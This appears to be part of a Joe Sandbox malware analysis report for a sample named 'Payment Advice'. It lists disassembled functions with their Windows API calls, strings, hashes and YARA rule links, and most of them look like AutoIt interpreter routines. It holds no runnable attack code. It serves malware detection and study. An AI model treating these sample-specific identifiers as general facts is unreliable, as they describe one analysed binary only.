Opcode Fuzzy Hash: b18543f3607defdbdb4bdfbd19db75736bf3b4e24bec257f2b4501c57176e1fc
Instruction Fuzzy Hash: 4C127B715083429FD724EF24C845AAFBFE5BFD9304F40491EF989A3251DB309A49CB62

Function 005ECE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005ECEFB
DestroyWindow.USER32(?,?), ref: 005ECF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 005ECFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005ED016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005ED025
DestroyWindow.USER32(?), ref: 005ED042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00580000,00000000), ref: 005ED075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005ED094
GetDesktopWindow.USER32 ref: 005ED0A9
GetWindowRect.USER32(00000000), ref: 005ED0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005ED0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 005ED0DA

Part of subcall function 0059B526: GetWindowLongW.USER32(?,000000EB), ref: 0059B537

Strings

0, xrefs: 005ECF1B
tooltips_class32, xrefs: 005ECFED, 005ED06E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 16ae480fd884cde5c76fbb5083a6f988f7a21f5367d543dbc54459472efaffbc
Instruction ID: c89b5d30899bc241b692bf8a41b4e015f31ac08758dc03c7f5bfa3bf3b539400
Opcode Fuzzy Hash: 16ae480fd884cde5c76fbb5083a6f988f7a21f5367d543dbc54459472efaffbc
Instruction Fuzzy Hash: 1D71ACB4150345AFDB24DF28CC89F667BF6FB89704F084519F9858B2A1E731E942CB22

Function 005EF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

DragQueryPoint.SHELL32(?,?), ref: 005EF37A

Part of subcall function 005ED7DE: ClientToScreen.USER32(?,?), ref: 005ED807
Part of subcall function 005ED7DE: GetWindowRect.USER32(?,?), ref: 005ED87D
Part of subcall function 005ED7DE: PtInRect.USER32(?,?,005EED5A), ref: 005ED88D

SendMessageW.USER32(?,000000B0,?,?), ref: 005EF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005EF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005EF411
_wcscat.LIBCMT ref: 005EF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 005EF458
SendMessageW.USER32(?,000000B0,?,?), ref: 005EF471
SendMessageW.USER32(?,000000B1,?,?), ref: 005EF488
SendMessageW.USER32(?,000000B1,?,?), ref: 005EF4AA
DragFinish.SHELL32(?), ref: 005EF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005EF59C

Strings

@GUI_DRAGFILE, xrefs: 005EF54B
@GUI_DROPID, xrefs: 005EF4D1
@GUI_DRAGID, xrefs: 005EF510

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 17e71164eb8c7c1f23ca56b839b2b8911becc8a88d80d87247acc6c1278a1189
Instruction ID: 3168e39b9a3edce9de87072226084a0f8912b7f83f4a454de73dfa77e5a0e7ca
Opcode Fuzzy Hash: 17e71164eb8c7c1f23ca56b839b2b8911becc8a88d80d87247acc6c1278a1189
Instruction Fuzzy Hash: B0612871108341AFC705EFA5CC89D9BBFE9BF89710F000A1EF595A61A1DB709A09CB62

Function 005CAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 005CAB3D
VariantCopy.OLEAUT32(?,?), ref: 005CAB46
VariantClear.OLEAUT32(?), ref: 005CAB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005CAC40
__swprintf.LIBCMT ref: 005CAC70
VarR8FromDec.OLEAUT32(?,?), ref: 005CAC9C
VariantInit.OLEAUT32(?), ref: 005CAD4D
SysFreeString.OLEAUT32(00000016), ref: 005CADDF
VariantClear.OLEAUT32(?), ref: 005CAE35
VariantClear.OLEAUT32(?), ref: 005CAE44
VariantInit.OLEAUT32(00000000), ref: 005CAE80

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 005CAC6A
Default, xrefs: 005CACFD

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 45a7eeff840e81fd97e69500f4a81dbdee7daf3520be55e238ab1486044cda34
Instruction ID: 10b299a000a686837c149f0b67d7d9468e90e259e0f06caa651a59ff842d9f41
Opcode Fuzzy Hash: 45a7eeff840e81fd97e69500f4a81dbdee7daf3520be55e238ab1486044cda34
Instruction Fuzzy Hash: 99D1D07160011AEFCB149FE5D888F6ABFB9FF84708F148959E445AB181DB70EC40DBA2

Function 005E716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 005E71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005E7247

Strings

COLLAPSE, xrefs: 005E728D
UNCHECK, xrefs: 005E740B
EXPAND, xrefs: 005E72E1
GETSELECTED, xrefs: 005E733F
SELECT, xrefs: 005E73E0
CHECK, xrefs: 005E7267
EXISTS, xrefs: 005E72B0
GETITEMCOUNT, xrefs: 005E7311
GETTOTALCOUNT, xrefs: 005E722A
ISCHECKED, xrefs: 005E73B2
GETTEXT, xrefs: 005E7382

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: db7bdaceef41db22af2789e3f913c13185beca7fc16e978ab1024c62c9a5f327
Instruction ID: d169b368f1e2a11bb493191c8271001f14076290e6e27e7cb5a8ca5c67046c64
Opcode Fuzzy Hash: db7bdaceef41db22af2789e3f913c13185beca7fc16e978ab1024c62c9a5f327
Instruction Fuzzy Hash: 94915F342047469BCB09EF11C855A6EBFA6BF98310F04485CF8966B392DF30ED06DB81

Function 005BCB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,005BCF50), ref: 005BCE90

Strings

L+c, xrefs: 005BCD14
NAME, xrefs: 005BCCC2
T+c, xrefs: 005BCD72
H+c, xrefs: 005BCCE8
4+c, xrefs: 005BCC96
REGEXPCLASS, xrefs: 005BCC56
CLASSNN, xrefs: 005BCC33
CLASS, xrefs: 005BCC10
INSTANCE, xrefs: 005BCD9E
TEXT, xrefs: 005BCDC7
P+c, xrefs: 005BCD43

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+c$CLASS$CLASSNN$H+c$INSTANCE$L+c$NAME$P+c$REGEXPCLASS$T+c$TEXT
API String ID: 3555792229-2558571808
Opcode ID: bbcf6da40ddd96d68eaa6daf3fc4bf42f1c1332bd5eee7e3c042b61ce0d0ab65
Instruction ID: ea78fe3f554634782d662feb4a08f217f91f864be53f5ade61f11b8209326774
Opcode Fuzzy Hash: bbcf6da40ddd96d68eaa6daf3fc4bf42f1c1332bd5eee7e3c042b61ce0d0ab65
Instruction Fuzzy Hash: 4A916E30A00607EBCB19EF60C486BEAFF69BF44304F508519E85AA7251DF30B959DBE4

Function 005EE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005EE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,005E9808,?), ref: 005EE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005EE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005EE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005EE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,005E9808,?), ref: 005EE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005EE6DF
DestroyIcon.USER32(?), ref: 005EE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005EE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005EE717

Part of subcall function 005A0FA7: __wcsicmp_l.LIBCMT ref: 005A1030

Strings

.icl, xrefs: 005EE521
.exe, xrefs: 005EE541
.dll, xrefs: 005EE564

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 8cb68f011431a35d27e363cf2f1274c7caf1a4cc64d637280b60c705f53c7597
Instruction ID: 00871e3944323470784f523fabe95ad0d435988bb54f80c988c7f9c33687c27c
Opcode Fuzzy Hash: 8cb68f011431a35d27e363cf2f1274c7caf1a4cc64d637280b60c705f53c7597
Instruction Fuzzy Hash: AA610171550255BEEB28DF65DC4AFBE7FA8BB08724F104205F951E60D1EB70AA80CBA0

Function 005CD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

CharLowerBuffW.USER32(?,?), ref: 005CD292
GetDriveTypeW.KERNEL32 ref: 005CD2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CD327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CD35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CD38C

Strings

wait, xrefs: 005CD349
set cd door , xrefs: 005CD32D
open , xrefs: 005CD2EE
close cd wait, xrefs: 005CD377
closed, xrefs: 005CD2A6, 005CD2AF
type cdaudio alias cd wait, xrefs: 005CD30A
close, xrefs: 005CD298
open, xrefs: 005CD2B9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: c603637bffdf9adeb7a44fc36aa321ec79905a4ce5c4a7160549f2da21d79aa9
Instruction ID: aac7702e3b7564a6a18eb4900c005aef84deffb92f9d8a66fad9900603536c00
Opcode Fuzzy Hash: c603637bffdf9adeb7a44fc36aa321ec79905a4ce5c4a7160549f2da21d79aa9
Instruction Fuzzy Hash: 4A512A71104206AFC700EF20C98596ABBF9FF98758F10496DF896A7251DB31EE05CB92

Function 005C26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,005F3973,00000016,0000138C,00000016,?,00000016,0061DDB4,00000000,?), ref: 005C26F1
LoadStringW.USER32(00000000,?,005F3973,00000016), ref: 005C26FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,005F3973,00000016,0000138C,00000016,?,00000016,0061DDB4,00000000,?,00000016), ref: 005C271C
LoadStringW.USER32(00000000,?,005F3973,00000016), ref: 005C271F
__swprintf.LIBCMT ref: 005C276F
__swprintf.LIBCMT ref: 005C2780
_wprintf.LIBCMT ref: 005C2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 005C2840

Strings

Line %d (File "%s"):, xrefs: 005C2769
Line %d:, xrefs: 005C277A
^ ERROR, xrefs: 005C27D5
%s (%d) : ==> %s: %s %s, xrefs: 005C2824
Error: , xrefs: 005C27F7

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: fc8b025b1401d90c5b65b3da77e262d2e0e0f287593037b09a918cc39ded3b6a
Instruction ID: f45da39a72d770ca785937fc504caa265eb263a2dc1b98db0229253a3a6e7eb7
Opcode Fuzzy Hash: fc8b025b1401d90c5b65b3da77e262d2e0e0f287593037b09a918cc39ded3b6a
Instruction Fuzzy Hash: 6F41337280061AAACB15FBE0DD8BEEEBF79FF95345F500065B90176092EA345F49CB60

Function 005CD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005CD0D8
__swprintf.LIBCMT ref: 005CD0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 005CD137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 005CD15C
_memset.LIBCMT ref: 005CD17B
_wcsncpy.LIBCMT ref: 005CD1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 005CD1EC
CloseHandle.KERNEL32(00000000), ref: 005CD1F7
RemoveDirectoryW.KERNEL32(?), ref: 005CD200
CloseHandle.KERNEL32(00000000), ref: 005CD20A

Strings

\, xrefs: 005CD110
:, xrefs: 005CD11B
\??\%s, xrefs: 005CD0F4

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 1090c2f41c68c0faf36c751ffc3d49fe4b12634f5b1a24a021a14b30a0580fbb
Instruction ID: 51ba9df08de4c0f9f5861a137b9b88abe438c51f4f339bbb31a2d036bf0ae575
Opcode Fuzzy Hash: 1090c2f41c68c0faf36c751ffc3d49fe4b12634f5b1a24a021a14b30a0580fbb
Instruction Fuzzy Hash: 41319DB694010AABDB219FA0DC49FAF7BBDFF89740F1051BAF509D21A0E67096448B34

Function 005B87CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 005B882D
___wtomb_environ.LIBCMT ref: 005B884F

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

__malloc_crt.LIBCMT ref: 005B8875
__malloc_crt.LIBCMT ref: 005B8892
_free.LIBCMT ref: 005B88C9
__recalloc_crt.LIBCMT ref: 005B8902
__recalloc_crt.LIBCMT ref: 005B8947
_strlen.LIBCMT ref: 005B8973
__calloc_crt.LIBCMT ref: 005B897D
_strlen.LIBCMT ref: 005B898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 005B89BA
_free.LIBCMT ref: 005B89D4
_free.LIBCMT ref: 005B89E1
_free.LIBCMT ref: 005B89F3
__invoke_watson.LIBCMT ref: 005B8A0D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 36a0cdaeecd118f6f4e11a7fb6513980c59d0a25b7c786bf62422a3293cdd8cf
Instruction ID: 7855893fde61764ee6b7719036308463166563a29d47e0db157cbafcdf2cd71a
Opcode Fuzzy Hash: 36a0cdaeecd118f6f4e11a7fb6513980c59d0a25b7c786bf62422a3293cdd8cf
Instruction Fuzzy Hash: 9B61CF32900616AFEB206F64DC457FE3FACBB42761F242529F801AB191DF34E941CBA5

Function 005EE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 005EE754
GetFileSize.KERNEL32(00000000,00000000), ref: 005EE76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 005EE776
CloseHandle.KERNEL32(00000000), ref: 005EE783
GlobalLock.KERNEL32(00000000), ref: 005EE78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005EE79B
GlobalUnlock.KERNEL32(00000000), ref: 005EE7A4
CloseHandle.KERNEL32(00000000), ref: 005EE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 005EE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0060D9BC,?), ref: 005EE7D5
GlobalFree.KERNEL32(00000000), ref: 005EE7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 005EE809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 005EE834
DeleteObject.GDI32(00000000), ref: 005EE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005EE872

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: df0ad6ba4bd3fe8ae667e54ef3833f1465a820f6a1fdab20759e19fdcbe00023
Instruction ID: 0007017650006f8bca9d2c80a2b273137c82b07a22fef4a8007484023996a12c
Opcode Fuzzy Hash: df0ad6ba4bd3fe8ae667e54ef3833f1465a820f6a1fdab20759e19fdcbe00023
Instruction Fuzzy Hash: 0F415871640245EFDB159FA5CC89EAB7BBAFF89711F109558F94AD7260D730AD00CB20

Function 005D05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 005D076F
_wcscat.LIBCMT ref: 005D0787
_wcscat.LIBCMT ref: 005D0799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005D07AE
SetCurrentDirectoryW.KERNEL32(?), ref: 005D07C2
GetFileAttributesW.KERNEL32(?), ref: 005D07DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 005D07F4
SetCurrentDirectoryW.KERNEL32(?), ref: 005D0806

Strings

*.*, xrefs: 005D0845

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 15bba940a4063790f15bcb40df984dd5e5bea02cfbdb56720daa0ddaca14950c
Instruction ID: b12644c0d44c1477c04fbe95bcabddd8fb070e23dd5bf91fcded944c46188d97
Opcode Fuzzy Hash: 15bba940a4063790f15bcb40df984dd5e5bea02cfbdb56720daa0ddaca14950c
Instruction Fuzzy Hash: 64816C715042019FCB34EF68C845A6EBBE8BBC8344F14982FF885D7391EA30D944CB92

Function 005EEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005EEF3B
GetFocus.USER32 ref: 005EEF4B
GetDlgCtrlID.USER32(00000000), ref: 005EEF56
_memset.LIBCMT ref: 005EF081
GetMenuItemInfoW.USER32 ref: 005EF0AC
GetMenuItemCount.USER32(00000000), ref: 005EF0CC
GetMenuItemID.USER32(?,00000000), ref: 005EF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 005EF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 005EF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005EF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 005EF1C8

Strings

0, xrefs: 005EF079

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: df489decbed3338364a1a507c8f2a194132f46e24bf8c557d1a3e036838c6bf0
Instruction ID: 048bc35fda358d0499b912f38fa6d02f82eeac6cee4cd9b380ce5208c5b59f70
Opcode Fuzzy Hash: df489decbed3338364a1a507c8f2a194132f46e24bf8c557d1a3e036838c6bf0
Instruction Fuzzy Hash: 1B819171608385EFDB18CF16D889A6BBFE5FB89314F00492DF99997291DB30D901CB52

